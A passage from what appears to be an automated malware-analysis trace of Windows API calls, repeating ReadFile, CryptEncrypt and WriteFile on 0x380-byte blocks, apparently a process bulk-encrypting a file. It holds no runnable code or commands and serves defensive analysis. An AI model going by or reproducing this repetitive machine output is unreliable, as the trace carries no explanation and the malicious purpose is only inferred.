pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.461] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.461] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.461] CryptEncrypt (in: hKey=0x2faa48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.461] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.461] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.461] CryptEncrypt (in: hKey=0x2faa48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.462] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.462] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.462] CryptEncrypt (in: hKey=0x2faa48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.462] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.462] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.462] CryptEncrypt (in: hKey=0x2faa48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.462] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.462] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.462] CryptEncrypt (in: hKey=0x2faa48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.462] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.462] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.462] CryptEncrypt (in: hKey=0x2faa48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.462] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.463] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.463] CryptEncrypt (in: hKey=0x2faa48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.463] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.463] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.463] CryptEncrypt (in: hKey=0x2faa48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.463] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.463] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.463] CryptEncrypt (in: hKey=0x2faa48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.463] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.463] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.463] CryptEncrypt (in: hKey=0x2faa48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.463] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.463] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.463] CryptEncrypt (in: hKey=0x2faa48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.464] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.464] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.464] CryptEncrypt (in: hKey=0x2faa48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.464] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.464] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.464] CryptEncrypt (in: hKey=0x2faa48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.464] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.464] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.464] CryptEncrypt (in: hKey=0x2faa48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.464] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.464] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.464] CryptEncrypt (in: hKey=0x2faa48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.464] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.465] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.465] CryptEncrypt (in: hKey=0x2faa48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.465] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.465] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.465] CryptEncrypt (in: hKey=0x2faa48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.465] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.465] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.465] CryptEncrypt (in: hKey=0x2faa48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.465] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.465] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.465] CryptEncrypt (in: hKey=0x2faa48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.465] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.465] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.466] CryptEncrypt (in: hKey=0x2faa48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.466] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.466] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.466] CryptEncrypt (in: hKey=0x2faa48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.466] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.466] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.466] CryptEncrypt (in: hKey=0x2faa48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.466] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.466] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.466] CryptEncrypt (in: hKey=0x2faa48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.466] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.466] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.466] CryptEncrypt (in: hKey=0x2faa48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.466] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.467] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.467] CryptEncrypt (in: hKey=0x2faa48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.467] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.467] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.467] CryptEncrypt (in: hKey=0x2faa48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.467] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.467] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.467] CryptEncrypt (in: hKey=0x2faa48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.467] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.467] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.467] CryptEncrypt (in: hKey=0x2faa48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.467] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.467] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.468] CryptEncrypt (in: hKey=0x2faa48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.468] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.468] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.468] CryptEncrypt (in: hKey=0x2faa48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.468] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.468] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.468] CryptEncrypt (in: hKey=0x2faa48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.468] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.468] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.468] CryptEncrypt (in: hKey=0x2faa48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.468] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.468] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.468] CryptEncrypt (in: hKey=0x2faa48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.468] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.469] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.469] CryptEncrypt (in: hKey=0x2faa48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.469] WriteFile (in: hFile=0x5d4c, 